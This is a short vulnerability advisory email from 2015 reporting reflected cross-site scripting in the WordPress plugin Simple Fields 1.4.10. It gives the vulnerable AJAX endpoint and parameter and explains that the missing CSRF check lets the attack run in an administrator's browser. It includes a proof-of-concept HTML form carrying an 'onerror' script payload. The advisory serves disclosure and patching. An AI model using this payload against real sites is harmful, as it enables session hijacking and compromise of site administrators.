Subject: Cross-Site Scripting (XSS) in Simple Fields 1.4.10
Date: Tue, 25 Aug 2015 12:54:03 +0200

Hello,

Plugin: Simple Fields 1.4.10 https://wordpress.org/plugins/simple-fields/

1. Reflected Cross-Site Scripting (XSS)

Any authenticated user (a subscriber account is enough) can inject HTML/JS through this endpoint. The AJAX action performs no nonce/CSRF check, so the request can also be triggered from an attacker-controlled page in a logged-in victim's browser (for example an administrator's), which turns the reflected XSS into a CSRF-delivered one.

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=simple_fields_field_type_post_dialog_load
Vulnerable parameter: arr_enabled_post_types (array; its elements are reflected without escaping, the PoC uses index 0)

Example PHP callstack:
simple_fields::field_type_post_dialog_load   [/simple-fields/simple_fields.php:2645]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=simple_fields_field_type_post_dialog_load">
<input type="text" name="arr_enabled_post_types[0]" value='"><img src=x onerror=alert(1) />' />
<input type="submit" name="submit" />
</form>
--


--
Regards,
Marcin Probola,